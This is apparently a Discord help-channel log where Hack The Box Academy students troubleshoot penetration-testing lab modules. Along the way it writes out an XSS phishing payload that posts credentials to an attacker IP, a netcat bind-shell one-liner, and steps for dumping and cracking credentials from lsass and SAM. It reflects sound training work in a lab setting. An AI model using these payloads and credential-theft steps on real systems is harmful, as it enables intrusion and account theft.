#modules
Thanks @fathom pendant
Np, they were being cringe earlier and idk if he got manually muted or automuted because he said a banned word 
Yeah, earlier was auto.. but they got a forced 24 hour break
Bet
Thank you!
Hello guys i need help,
Module - Password Attack
Section - Windows Local Password Attacks - attacking lsass
My problem -> I compiled the lsass file using the Pypykatz tool, but I did not find any information about the vendor user.
https://academy.hackthebox.com/module/147/section/1359
Did you try other methods? Also idr pypykatz being useful for a windows lab
wdym compiled the lsass file?
Also this ^ pypykatz extracts from a .dmp
What are other methods?
Didn't realize this section didn't go over using stuff like secretsdump or @next bronze super cool dump tool
how could they 
secrets dump doesn't dump lsass tho
oh they only talked about pypykatz, weird
Yeah, which I'd think maybe they'd reference mimikatz or have it on the host
yes i tried secretsdump
If you want you can add | grep -i "vendor" -C 10
That should at least make it easier to see
(-C gives context lines around it)
-A is after, -B is before
unless you're in my head where it's above and below and always get it wrong >.<'
Just edit the grep binary to make it so 
cool just found a bug in my tool 
Time to throw it in the bin
stuck on sqlmap essentials skill assessment, located the post req but can't bypass protections
i tried all things covered in module, im literally just spamming one tamper technique after another
Is this the right Channel to give feedback on a module?
thank you
Which ones did you try
I am still beating my head against the wall trying to figure out this domain enumeration module
Mind reading credits all used up
all of these for now
percentage is that giving me hope rn but idk
hi guys i need help, i found the flag but it shows me that it is incorrect
module: password attacks -> section: pass the ticket from linux
also they're taking forever to finish, and i don't even like what i'm doing rn, i mean i should be able to know what's happening to be able to choose a tamper, not just spam them
Well I can say you did use at one point the correct tamper
Hi guys! I have a problem with my parrot os in virtualbox. When i try to boot it i get a message: "please switch to a supported graphic device to avoid problems". What can i do? It's the first time it happens
Any particular question on it or the whole section?
The whole section really, I got the fqdn and somehow figured out that there are 2 zones, struggling to find the Txt record now
you probably got the wrong flag, what's the first 3 character? and which question
Should be pretty quick to complete, what other flags did you use?
just --tamper flag and --dump
maybe don't use --dump, it will take longer, have it list the available database, then you can make it dump a specific table in that db
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio. | flag: JuL
seems right, make sure there's no spaces before and after
I suggest you dig yourself a hole for most of that section and get comfortable
cool, I have been stuck in nslookup land and not getting far
Ooh nice one
Nslookup can also get you answers, but far and away dig is just a cleaner tool
Much nicer output
sorry for my grumpiness yesterday. Apparently I was having a day
It happens
I know that there are two zones but for the life of me I can only get nslookup to output that there is one
thanks @next bronze and @shut quest , my internet is slow af i just realised i was connected to my friends hotspot connection which made sqlmap to run so slow lol
got the database name and got flag !
Ty
You can use nslookup on a subdomain with axfr
| nslookup -type=any -query=AXFR inlanefreight.htb 10.129.18.203 |
You can look at subdomains with it too
I thought the pipes were supposed to mask it?
I've checked everything and it's still showing as incorrect :/
||I have the syntax right, I should just look at subdomains?||
Yes
cool
You should have a list of available things to look at
I do, yes
Try looking within
will do, Thank you
I've probably missed something stupid, but on the WinEsc module and the weak permissions section I have added myself to the administrator group by modifying a service's binpath to add me to the 'local administrators group', but I can't access the administrator user folder?
Sign out and sign back in
ahh okay thankyou
I'm lost in footprinting IPMI last question "what is the account's cleartext password". I do not know what to do.
thanks, got the TXT record
Crack the hash
Don't use the mask (a3 ?1?1?1?1?1?1?1?1)
do use the mode
I try to use hashcat but think it does not work, it says “separator unmatched”
Then you copied it incorrectly
check the format of the hash. i like this resource myself https://hashcat.net/wiki/doku.php?id=example_hashes
probably need to use --username
That too
When use - - username it says “failed to parse hashes using the native hashcat format”
Don't put spaces
I did here not in the prompt
Don't add spaces here then :) it avoids confusion
Either way did you copy the hash exactly as shown in the msfconsole output?
(And are you using the 7300 mode)
Yes
whats your hashcat command
Hashcat -a 0 -m 7300 —username
..did you include the hash?
Yes
#modules message adapt it for your own use, you don't have to put -w 3
that hashcat command is missing some inputs
BRUH IS HTB WEBSITE WORKING FOR ANYBODY
nope, it's down I guess
My machine crashed, so at least I know it's not just me
yep came here to check lol, my machine crashed, and now wont spawn
the team is aware. hang tight
We're looking into the issues
phew, i thought i was trippin
Ill update here when i can
dope
I am on the last question now finally. How many A Records are there for all zones. I know there are 2 zones, but every time I can only identify one zone
done, working again
You need to bruteforce this one with a listed tool, all wordlists aren't created equal
||bust it|| got it, hints on how to pick a wordlist, or am i using the one created in the documentation
last time i got yelled at by staff for mentioning the platform was down here, they said to reach out to support
Start with the given. Then look through a repo like seclists and start small
when it first happened g0blin mentioned it here and let us all know it was a known issue and being worked on, then the other night it happened again and i asked here and was told it wasn't the place to discuss it, but now we have staff here talking about it again. really confusing inconsistency with policy.
so now it seems again that it's OK to ask here if there are technical issues with the platform? is there a page we can visit to get the policy for the day?
surely it's not just up to how the staff member is feeling at the time, is it?
Generally this isn't the place to ask, no, simply because the majority of the time it's a personal issue and it's just annoying to have people pester others when it's their own connection, so you should contact support about such issues.
But like if a staff member wants to pop in to reassure people real quick thats okay for them to still do so.
is there anyone on here who did the Introduction to Python 3 module? I can't get it to take the answer for the Managing Libraries in Python (Continued) section, (question 2) and just wanted to see if I am putting the wrong thing in, it seems like an obvious answer to me.... Thanks!
Things should all be working fine now btw
General rule of thumb is technical issues goto platform
you're welcome to ask here if you think the community knows
but for any support from HTB, it needs to go via the platform
right.. but if the platform is down you can't do that lol
there is an email technically lol(customerops@hackthebox.com)
but yeah if its down just dont spam it
mind if i dm? @cloud urchin
sure
can you dm the script or help me this is the last question i need for this module
if you have not done the module, no. read this #modules message
tbh i've been at this for like a week, i'm assuming my problem atm is converting to utc, i'm probably just confused by the smallest thing.
you can use
replace(tzinfo=pytz.UTC)
hey all, can somebody help me with the easy lab of Attacking Common Services? I already have the creds of the user f***** but i'm stuck. Can't seem to authenticate to the smtp server
Maybe it's a problem with my understanding of smtp
you should try authenticating to another service
- check if ftp anon is allowed, the files inside might be of use to you 🙂
would i need to put the . in between the username and time as it is shown in the php code or can i just do md5(user + time)
ohh thanks was trying to connect to the other service but it was so slow i don't have enough patience i guess haha
Thanks !
Is the target spawning for you guys?
yup
well it seems i was just impatient this whole time and expected it to be in the first few requests. got the flag!
I'm stuck again haha, so i connected successfully to the other service, i uploaded a shell but can't seem to be able to execute it. I'm only able to download it. Any clues?
What service is that?
ftp
i cant connect with the credential i have via rdp
Read the files; one of them shows how to get a reverse shell
There is more than one way of doing it
hi guys having a problem with suricata rule development as i'm unable to rdp for the last hour, anyone has any idea how to figure this out ?
SSH
turns out it was because i did not type this at the end : /relax-order-checks +glyph-cache
aww man i really wanted to win the prize...
I wonder what the new academy modules are going to be about 🙂
I'd love to see more modules for the binexp path 😄 or maybe some cloud modules
❤️ academy
dir
can i dm anyone for some help at Question 8 in module AD Skill assessment II
Ask here I will try to help
need some clarification regarding chisel. does chisel start a socks proxy automatically without needing to specify the proxy, and does it also automatically create an SSH connection, meaning the ssh command is not needed to start ssh, chisel will start ssh?
./chisel client -v 10.129.202.64:1234 socks.
2022/05/05 14:21:18 client: Connecting to ws://10.129.202.64:1234
2022/05/05 14:21:18 client: tun: proxy#127.0.0.1:1080=>socks: Listening
2022/05/05 14:21:18 client: tun: Bound proxies
2022/05/05 14:21:19 client: Handshaking...
2022/05/05 14:21:19 client: Sending config
2022/05/05 14:21:19 client: Connected (Latency 120.170822ms)
2022/05/05 14:21:19 client: tun: SSH connected
i got nt system at host SQL01 and i already transferred mimikatz, but when i run it, nothing happens and i can't even interact with anything, so i gotta do everything all over again
checks
- did you run mimikatz with administrator privileges?
Are you trying to RDP into it? I dont remember if SQL01 has RDP access (I may be mistaken) , try with psexec or winrm ?
i got service user in mssql then from mssql i reverse to my box, then elevate to system so i cant winrm yet
Mimikatz should ideally work in the shell of SQL01
ikr, but i got shell with nt system and when i ran it, the shell keep hanging there ...
I cant think anything at the moment that will help you.
thanks, i guess the lab got some problem
Try restarting the lab
hello guys,
I prepared a bash script. This script saves each user information in the content of the lsass.dmp file to a different txt file.
```bash
#!/bin/bash
# Usage: ./split_lsass.sh lsass.dmp
lsass_dump="$1"
if [ ! -f "$lsass_dump" ]; then
    echo "Error: lsass.dmp file not found!"
    exit 1
fi
# Parse the minidump with pypykatz and capture its text output
mimikatz_output=$(pypykatz lsa minidump "$lsass_dump")
counter=1
filename=""
while IFS= read -r line; do
    # Each "== LogonSession ==" header starts a new output file
    if [[ $line == "== LogonSession ==" ]]; then
        filename="LogonSession_$counter.txt"
        counter=$((counter+1))
    fi
    # Skip banner lines that appear before the first session header
    [ -n "$filename" ] && echo "$line" >> "$filename"
done <<< "$mimikatz_output"
echo "LogonSession information successfully extracted and saved to files."
```
ogonSession_1.txt LogonSession_12.txt LogonSession_15...
hopefully it benefits your business
@tired schooner i have a real job
you can also try to dump SAM
you may find something juicy there 😉
can I discuss something about AD enum module with someone. One thing got me confused.
sure
is there a certain reason you would want to use export when using whois, dig and nslookup instead of just using the commands on the target domain? I know export is for setting an environment variable, just confused why they do it like this in the module
yeah, i got it with dump sam
So instead of writing the whole target every time, you just call the variable
makes sense, thank you
Module: Attacking Common Services, Section: Attacking SQL Databases, Question: Why i cannot crack the ntlm hash intercepted by impacket-server, using either password given at Resources or rockyou.txt, might need a nudge
ntlm hash intercepted:
```
mssqlsvc::WIN-02:aaaaaaaaaaaaaaaa:lm:nt
```
the password may be too strong, you can always pass the hash
mmm ok ill try it now
I am doing the Using CrackMapExec module and I am having a bit of trouble in the Gathering Information with an Account -> MSSQL Enumeration and Attacks section. I have found the user for the first question, but when I try to query the database core_app it seems that it is empty (I have confirmed that it exists though):
||```bash
$ nxc mssql 10.129.204.177 -u 'engels' -p 'Inlanefreight1998!' -q 'SELECT table_name FROM core_app.INFORMATION_SCHEMA.tables'
MSSQL 10.129.204.177 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL 10.129.204.177 1433 DC01 [+] inlanefreight.htb\engels:Inlanefreight1998!
```||
I thought it might be an access issue, since this user is not a DBA, but privesc does not work either:
||```bash
$ nxc mssql 10.129.5.141 -u 'engels' -p 'Inlanefreight1998!' -M mssql_priv -o ACTION=privesc
MSSQL 10.129.5.141 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL 10.129.5.141 1433 DC01 [+] inlanefreight.htb\engels:Inlanefreight1998!
MSSQL_PR... [*] INLANEFREIGHT\engels can impersonate: julio
MSSQL_PR... [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR... [-] can't find any path to privesc
```||
Any nudge would be highly appreciated!
```
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Encryption required, switching to TLS
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed for user 'mssqlsvc'.
```
i have error passing the hash, what was the syntax of the command :0
hey any hint for it?
whose creds do you have
||'engels' -p 'Inlanefreight1998!||
i am trying to answer this question: What is the password for the "mssqlsvc" user?
is that the only set of creds you have
I have 3 users, tried all of them, but since this user was the answer to the previous question, and there is a privesc path, I thought that would be relevant.
I'm looking over what I did in that module, so I'll need an answer to my question.. again. what users do you have creds for
||engels, grace,diana||
at the very start of the mssql privesc section, there's a paragraph with the last sentence saying "In the following example, the user INLANEFREIGHT\robert has the privilege to impersonate julio who is a sysadmin user." .... have you tried those credentials?
okay let me google how to use hashes with that program for you
or perhaps what tools did u use, i could google it tgt as well
sure
$ nxc mssql 10.129.5.141 -u robert -p Inlanefreight01! -M mssql_priv -o ACTION=privesc
MSSQL 10.129.5.141 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:inlanefreight.htb)
MSSQL 10.129.5.141 1433 DC01 [+] inlanefreight.htb\robert:Inlanefreight01!
MSSQL_PR... [*] INLANEFREIGHT\robert can impersonate: julio
MSSQL_PR... [*] julio can impersonate: INLANEFREIGHT\robert
MSSQL_PR... [-] can't find any path to privesc
The thing is julio is not shown as a sysadmin, so it can't really privesc to its account. I have tried all combinations of authentication methods as well: --local-auth, -d ., and -d inlanefreight.htb, but none worked.
That msg was for the other guy
if I remember right there are 1 or 2 things that don't work in nxc, try with cme for this specific module
that's interesting, good to know
Did that as well, but it gave exactly the same results. I suspect the only issue is that julio is not a sysadmin and it is supposed to be.
i am doing footprinting lab-hard. i already got 'tom' and the password. Then i got an openssh private key by imaps. But the key doesn't work, anyone can help?
it says : error in libcrypto
have you completed the first question?
I just tested the answer I gave, which is in the module, on both CME and NXE, and they both work.
Is your key formatted correctly?
Reboot the machine, works for me with nxe and cme.
i copied it from a email
Key works. Its most likely a problem with either a formatting like an enter at the end etc
Or for w/e reason it's copied with CRLF
The whole file? Or its contents?

I've seen it happen a few times
Where the only way to see it is either with file id_rsa or vim -b id_rsa
yes
Where instead of the $ at the end you see ^W
use this "1 FETCH 1 body[]" and copied the content
Only copy from ----Begin to the end
Yes i did the same. Worked, but if maybe you accidentally copied one character too much either at the beginning or end or something it's gonna throw problems
The ----BEGIN and ----END lines are important
i did copy from "--BEGIN OPENSSH PRIVATE KEY-----
" to "-----END OPENSSH PRIVATE KEY-----"
The BEGIN does need all the -
five -
im in the phishing part in xss, i used the payload ||'><D3V%0aONmOuSEoVeR%0a=%0aconfirm()><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.15.198<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <! --||
I sent you a DM!
but im only getting a password prompt in the website
not the username
nvm i missed a < in my payload
i really don't know where my problem is
What's your command to ssh?
ssh -i id_rsa tom@ip
Just in case, is id_rsa 600?
It is like a VPN issue. I tried doing it from a HTB Parrot instance and there user julio shows as sysadmin. But when I connect from my PC, no matter how many times I restart the target julio is a standard user!
hmm that is weird, I used my vm throughout the module
check if you have spaces left after END OPENSSH PRIVATE KEY-----
no
try to chmod 777 id_rsa
That would leave the permissions too open
or just make it executable ,
And then ssh would yell for a different reason
i think i once did chmod +x to make id_rsa for it to work but i could be wrong
i don't think it throws errors
If you have an rsa key that's 777 ssh won't allow the connection
And explicitly tell you that it's a permissions problem
i see, my bad, but i guess +x wouldn't make a difference ?
It generally wouldn't
As there's no reason an rsa file needs to be executed
It's only read
makes sense
Did you try swapping positions of your arguments, ssh tom@ip -i id_rsa
didn't work
Weird
chmod 600
He already did
I dont have the file on me to md5sum it
I have the full ssh key copied in my notes
I have a question about "PIVOTING, TUNNELING, AND PORT FORWARDING " ' submodule "RDP and SOCKS Tunneling with SocksOverRDP".
Whenever i try to load the SocksOverRDP DLL using regsvr32 on the foothold htb-student, it gets blocked. I made sure the AV is turned off to no avail. Is there a problem with the machine or am i doing something wrong?
If you can copy to a file and md5sum for them, that'd be helpful
They state they have all the required lines
Real-time protection
yea give me a minute or two since im in a diff country and have to use a shitty laptop with pwn box
Just because defender is off doesn't mean there isn't any protection
Ah
@solid moth if you do an md5sum does it match this?
let me go boot up the lab hard and see if i can login with that ssh key
so we know if mine is correctly or a character slid into it
My other suggestion is pasting into another text editor
no
Sometimes it's dumb
it doesn't match
@fringe urchin does yours have an extra line?
ok give me a second im booting up lab hard machine and see if i can login so we know if mine is correct
Just to make sure all conditions are similar
i got in !!!!
mine works
👍
you used nano before?
is there anything else then vim ;p
VI 
Using a second text editor tends to fix issues
this is very helpful!
Had a weird issue one time where a character got transposed
hello im in session hijacking, i don't understand the part where the server execute our script.js in our vm locally
to identify where the xss is happening
the "script.js" , is any jS SCRIPT we should write?
i can't seem to understand this to identify the injectable field
can you send me the link to the module? Need to check if i did it
alright here it is :https://academy.hackthebox.com/module/103/section/1008
Is it the "detection" part you don't understand ? "So, we can use this to execute a remote JavaScript file that is served on our VM. We can change the requested script name from script.js to the name of the field we are injecting i"
I need help about these tasks ** Skills Assessment - Using Web Proxies** (the 3rd question). https://academy.hackthebox.com/module/110/section/1055
Don't read/look at the images if you don't want to get spoiled! ⚠️
|| I found the cookie decoded and now I replaced it in the request to have something like it (1st img), then I started an intruder Attack with Burp Suite to find the correct cookie and have a full md5 hash. Why everything is "good" in the requests then ? I missed something 🤔 ? ||
yes but
what is the content of that js file that is served on our vm
since initially i dont have any js file on my vm
So in the detection process, we don't need to provide any script.js file initialy, since we only want to know which field is vulnerable! I'll elaborate in my next message^^
During the detection process, we only want to know what field is vulnerable to XSS. Assume you have 3 fields we want to test for XSS: name, username and website
So in order to detect if any of the fields are vulnerable, we send an XSS payload containing that fieldname so when the target executes the XSS, we will know which field was vulnerable.
For example we will use the following three payloads: <script src="http://OUR_IP/username"></script>, <script src="http://OUR_IP/name"></script>, <script src="http://OUR_IP/website"></script>
Once the target executes the payload, we will receive a GET request on our website to either /username, /name or /website
Then we know which field is vulnerable and we can move to the next step to steal the session cookie
Hope that explains it! If you have any more questions, feel free to ask 🙂
oh i think i understand, im dumb, so if the "X field" is xss vulnerable we would get the GET request back to our vm, it won't find any file tho
so in detection , creating a file isn't necessary
yes exactly!
but in the section, they went through different payloads after detecting the vulnerable field using <script>...</script> right?
that payload didn't work and instead i was detecting & choosing the payload at the same time
is that how its works?
yeah it's a bit confusing since it sounds exactly as you mentioned. But in fact you need to try all the six different payloads in the detection process to find the vulnerable field
thanks man , now i understand very well how it works
on Attacking Active Directory & NTDS.dit, i tried to bruteforce jmarston password using the password list given by htb but i got nothing, should i try rockyou.txt
but when i try to use rockyou in crackmapexec
i cant crack because no hash is provided
Should be in the ntds.dit iirc
Oh wait that's the next Q
There's a wordlist suggested by the module section
ya but it doesnt work
The fasttrack.txt?
nope the password.list
ive read through the discord message and i found out it was in rockyou but i cant seem to insert rockyou in crackmapexec it got this error
Either way I wouldn't bruteforce with rockyou
Hey, if I have questions about an exercice for a specific module where do I go ?
this is the place
Okok
It is the GET section in the Web Requests module, the fundamentals. I don't understand what I'm supposed to do with devtools and curl, the module shows what to do except that the exercise consists of repairing the site
I don't have information like "search=le", I'm clearly lost
Hey anyone know from the attacking common services/attacking smb how to download the id-rsa file to login via ssh after we have got the password ?
use get
if you're already in the smb session and want to transfer the id_rsa file to your vm, use get id_rsa
also you can use help in smb to display commands available to you
for Linux priv esc, Shared Object Hijacking, im so lost. Where is the payroll binary? I found the libshared.so in the development directory but can't seem to find payroll anywhere
Embarrassingly enough, I seem to be stuck in the Public Exploits Section of the Getting Started module inside the Pentester path. After scanning the server with various methods, I have discovered that the only consistently open port is 22, running openssh ver. 8.4p1, and the OS is Linux Debian Bullseye or Sid. There are various other ephemeral ports running nginx 1.19.2 and Apache 2.4.41 (Ubuntu). On one of the servers (I have restarted the target server several times) I found one port running the Firefly music app, but that was several servers ago. I have searched on Google, exploitdb, and metasploit, and can not find any usable exploits. The hint says to look for plugin exploits, but I don't see any services that are plugins or that use plugins. Any hints would be appreciated.
Maybe visiting the website should give you additional info that you need
Thanks, Schainy.
I hope that it helped you! If not let me know! I'm also speaking off the top of my head, if it's something specific i would need to get my notes
Will do. Waiting for an open Pwnbox instance at the moment. Must be a busy day at HTB
If you have the chance make your own vm machine!
Good point. BTW, your hint did the trick. Got the file, now I just have to find where msf put it. The indicated path doesn't seem to exist. But that is another problem
Can I DM someone for
ABUSING HTTP MISCONFIGURATIONS
Skills Assessment - Hard ?!
And once again, thank you. Moving on finally!
Im pretty sure the exploit tells you the path
If you still have problems i can take a look if you provide screenshots
Nope. I was just being stupid. I had no trouble navigating to the (hidden) file. I should never type before thinking things through.
Guys only i don’t have retired machines?
I mean there is only 10 machines and they are hard and insane lvl only
Or that cause of maintenance?

Stuck on Attacking SQL Databases, no idea whatsoever. logged into the mssql server using the given htb credentials. looked into the db, found no weird table. stuck there, any hints to follow
"found no weird table"? there isn't gonna be a "weird" table
also: did you escalate to the mssqlsvc ?
if not: then first find a way to do that - theft is definitely an option
(yes that's a hint to the next step method)
lemme try, thanks
hi, can anyone help me with SeDebugPrivilege from windows privilege?
In Exploiting internal Web Applications I in the Advanced XSS and CSRF Exploitation module I have found the secrete table but listing it's contents returns a 500 error. The same "select all" query on the other table works perfectly fine... Anyone can help with this?
i am at the skill assessment 1 of the module attacking common services, shouldn't i be able to find the user with smtp-user-enum and the provided list in the resources?
anyone have any advice on how to answer questions in learning modules where i don't even know where to start? there have been so many questions that require information that wasn't even covered in the module and i can't figure out how to solve them besides looking up the answer to the question, which i don't really want to do. i want to figure it out myself.
google specific things, look at documentations
what kind of question are you talking about
Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
right now i don't even know where to start other than curl https://www.inlanefreight.com
curl doesn't even work in the pwnbox for some reason
so i have to use a terminal
is this part of the Linux Fundamentals module
yeah
pwnbox doesn't have internet access if you're on the free plan
i'm on a student plan
curl should work
ok so curl works but it gives me different results than when i use the same command in my terminal
Yes you should.
okei...but i have 0 results... strange...
i found it yesterday...but did not finish the module...
What’s your command?
or the skill assessment
smtp-user-enum -M RCPT -U /opt/useful/SecLists/Usernames/xato-net-10-million-usernames.txt -D inlanefreight.htb -t 10.129.91.250
smtp-user-enum -M RCPT -U usernames.txt -D inlanefreight.htb -t 10.129.91.250
or with the list in the resources
I think you’re supposed to use the User.list provided by htb.
yes usernames.txt is that list
i think i can remember the name...but why do i not find it anymore
spawned a new target and now within seconds i have the result...
anyone?
Retrieve the contents of the SAM database on the DEV01 host
In network attack. No way to connect back to the DMZ host. nc and sbd are not connecting, msfvenom payload is connecting but no shell.
There is no firewall. I don't get what can block a reverse shell
Am I tripping or did they migrate the cheatsheets from .md to PDF?
why do you need to connect back to the DMZ? why not just set a pivot
yes
that's been a relatively recent/mixed thing
How do I rebel?
write a strongly worded email
@slender shoal Hey are you a mod can u fix this?
"I hope this email finds you before I do"
mods aren't staff
nah it's clearly @slender shoal's fault
mods/admins are only on the discord side; (if they don't have the staff role)
hello, any luck with VAD analysis, i am doing the same module,
@fathom pendant ssh to dmz to set up nc -nlvp should be simply working
don't ask to ask, describe what you need help with
are you trying to get a revshell from DEV01 back to the DMZ host?
or from DEV01 back to your machine
if back to your machine: you need port-forwarding
as the DEV01 is likely on a separate subnet from the jump host
from DEV01 back to the DMZ
yes
172.16.x.x
how are you port forwarding? if want to connect a rev shell, you'll need a reverse tunnel
You can email them, but I cant change it.
lies 
I don't need a tunnel if I receive the shell from my DMZ ssh session
There is maybe a conflict with sshuttle
Seeing a lot of "let me restart the machine". It could work. Is cpts the same? Can it break?
sometimes; but specifics re the exam can't be discussed
same troubleshooting steps apply, restart - if you still believe the issue to be with the lab and not your skill -- contact support
personally? I've only seen one or two times where restarting fixed something, the rest is all skill issue (talking about modules in general)
Yea i understand! Was just wondering if it can happen and if the cpts exam can easily be restarted like normal machines
yeah you can reset the exam lab
ok ty
good morning, I am stuck again. https://academy.hackthebox.com/module/144/section/1257 I enumerated the target and found about 12 vhosts or so, I am not sure what to do next to find the flag
you need to use the tools and techniques shown by the module to find the valid vHosts that aren't just the default page
any vHost will be a hit
it's about determining which are false-positives
yeah, i used ffuf to find about 12 or 16 vhosts
well then your ffuf is set up incorrectly
you need to filter out the default response size
how do you determine the default response size?
by using the techniques shown in the section
I don't think it covered how to set that
yes it did
the simple loop shown in the section showed how the example got the filter size of 612
Content-Length = Response size
the cat <file> | while read vhost; do ...;done loop
looking
where it refers to finding a hit for dev-admin
attacking common services, skill assessment 1, i found the user, but now no pw. any hint what to do?
well; there's other available services to attack
why not use that username to attack a service, perhaps related to the user you found
tried a few, but will try again
if it's a certain username try attacking with and without the @domain
my only hint to you for what service to try is re-read your notes regarding services - some are more tied to each other than others
and pw reuse is very common
Could someone explain why SELECT * FROM logins WHERE username='notAdmin' OR '1' ='1' AND password = 'test'; would not work? HTB says this would be invalid because the username does not exist, but wouldn't the OR condition evaluate to true regardless of the 1=1?
you're likely misunderstanding what's being said; but also - the reason it doesn't work is the "AND" operation
if there isn't a 'test' password it'll still fail
A OR B AND C
[A OR B] AND C is how it can be read
the and statement is what might invalidate it
Marcie, when I ran the script you alluded to, the responses all came back with content length 10918, when i ran ffuf with that flag to eliminate that response I was left with no output. I am missing something in this section, but not sure what
using the right wordlist
ah
don't use the small ./vhosts list they give you
use the SecLists wordlist they refer to in the reading
ok let me try again
I'm not sure I understand what you are saying. ||cat /home/simon/SecLists/Discovery/DNS/namelist.txt | while read vhost; do echo "\n********\nFUZZING: ${vhost}\n********"; curl -s -I http://10.129.37.42 -H "Host: ${vhost}www.inlanefreight.htb" | grep "Content-Length: "; done|| still coming back 10918
use the seclist with ffuf
also
your command is wrong
your command would append something like us1www.inlanefreight.htb
I thought for ffuf you needed to have identified the vhost first?
no
you're using ffuf to identify valid vhosts
that actually contain the info we want; everything else redirects to default page
you want to put the VHOST before the .inlanefreight.htb
the provided vhost they use as an example to baseline with
you want it to give you ${VHOST}.inlanefreight.htb (but using curl is EXTREMELY slow)
ok, thank you. let me mess around with this information now
ffuf will be faster; and using the right format you will get it
In "Windows Privilege Escalation Skills Assessment - Part I", im wondering how you download the printspoofer.exe to the target, I tried doing the python http.server to /users/public, /windows/temp, /windows/tasks, /windows/system32/temp and I got nothing
well it could be that python isn't installed on a windows machine
unless you mean download from your system to the target
also you might need to specify C:\<filepath>
I just typed out a whole message asking for help and got a warning about sending the same message over and over??? And I lost the whole message I typed out 😦
because it contains a bunch of lines of code
which the automod interprets as spam
in order to not have that happen: follow and read #welcome
it's free and takes a few minutes to set up
Anyone have a second to help with Shells and Payload - Bind Shell?
then use less words to ask your question or break it up
only if you actually ask your specific question
Well I've been stuck for like 12 hours so I wanted to be thorough.
No good deed, right? This is kinda of obnoxious.
well there's being thorough and then there's adding way more info than you need
i.e. i've tried xyz methods instead of being hyper specific with commands
Finally finished the AD module! Phew. That was a tough one.
I was thorough. idk, that isn't a helpful response.
most people that have done the modules will be able to pick up what you want/are struggling with
reminds me i need to finish that
well we didn't see your message
I know. And I lost it. Due to stupid discord nonsense.
Logged into the SSH account and ran the syntax the module gave ||rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l <ip> <port> > /tmp/f|| and then attempted to run ||nc -nv <ip> <port>|| as the module suggest, but it wouldn't work... got connection refused, do I actually have to run the bind syntax on my machine and not the target?
so again what i'm meaning is use less words to convey what you're struggling with
instead of focusing on discord/automod deleting it
It took me for.ev.er... but it is done now.
depending on the port you are trying to open, it may require sudo, try ports > 1024
i used sudo, should've prefaced with that
That is the right way to do it though right?
Intro to Assembly Language Skills Assessment The above server simulates a vulnerable server that we can run our shellcodes on. Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)
completely stuck. dont want to say what I've tried already in fear of this post being automoderated and deleted like last time.
sec if you use the pipeline twice before putting text in and then twice when you're done it hides it so it isn't a spoiler
Whoops, wrong question: Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
the way it instructs is to use the ip of the target machine
in the ip -l part
aka telling it to listen on that interface
is that what you did? or did you use your machine's tun0 ip
I thought so, maybe it's just user error, I'll try again, would it be too much to ask for an explanation of what the bind shell syntax is actually doing? I try to understand everything so it makes sense instead of just typing it, and no I used target ip
i mean
and just to double check you run the bind shell syntax on the target machine right?
yes
if it is I completely understand that
just figured it was worth asking
bind shells are like reverse shells, but the other way around
instead of you opening a port on your system and having the target call back, you open a port on the target and have your system call in
Intro to Assembly Language Skills Assessment
Disassemble 'loaded_shellcode' and modify its assembly code to decode the shellcode, by adding a loop to 'xor' each 8-bytes on the stack with the key in 'rbx'.
Completely stuck for over 10 hours. Have tried everything I can find in the whole module. Not even sure what the format for the answer should be. Is this a flag?
got shellcode for loaded_shellcode, assembled it, gdb'd through it. not sure what I'm looking for. Keep getting seg faults. Have tried several things mentioned throughout module to make it all fit, but I am getting nowhere. Just confused, going in circles.
wait you mean this question has been asked and answered? :O
most people don't use the discord search feature
@next bronze Hey mate, mind if I DM you for a minute?
or even know it exists
Ngl they made it far worse with the new updates
Ya'll are kinda jerks? Not familiar with discord. Sorry for coming to the community for help looking for help.
Same shit last time I came here for help, too. Not a welcoming community.
Very frustrating.
i'm not really being a jerk, just stating how it happens often
and Xreous actually linked to an answer
I know. That was nice of them. That was helpful.
i just didn't wanna use the discord search feature for you
if you tap the channel name it the top it should give you a menu where you can find the search if on mobile
otherwise top-right of the app is a search bar
imo the mobile one is just stupid
CTRL+F preloads the channel in search.
Or, you could own that it wasn't a welcoming way to follow up a legitimate response. This server is 0/2 with me coming here earnestly looking for help and people just being kinda dickish for no reason. When I'm just here looking for a little help. No need.
mobile doesn't let you specify channel
In: ?
if i wanted to be a dick i could have been, I explained why your message got deleted and that it might not if you truncate your message
doesn't work on mobile
i even offered a way for you to ensure it doesn't get yeeted
I literally wrote that message to help people with that question, not sure how that's not helpful
Works for me
You weren't helpful at any point, Xre0us was. Stop following up like you did good here. You were just standoffish, that was it.
what for
weird
Marcie, I tried that again and just get "nc: Permission denied" lol
Just wanted to ask a couple questions about CPTS if you could answer was all
I don’t really like pineapples; they hurt my teeth.
whatever dude
Maybe with the recent update it got fixed. But ngl search on mobile since the last big update about that it just went downhill
glad your issue is resolved
mobile is always an L
most questions that can be asked have been answered in #cpts
Oh alright cool thanks... Figured cause I saw the role I would ask but if there's a channel that answers questions etc that's even better
yeah feel free to ask over there
Hey, I'm struggling with the Abusing HTTP Misconfigurations HARD skill assessment. Can someone please DM me for help? Thank you.
it just depends on the question, if it's a broad question that's not about the content 👍
if it's a question re: specifics 👎
ah alright gotcha
and I don't know if you saw my response, but tried again and just get "nc: Permission denied"
i did; it sounds like nc doesn't have the right perms
try setting a higher port to connect to
4444/9999/42069
weird, I tried 4444 originally, let me try again
bingo, not sure what happened but I'm good now, sorry to bug you
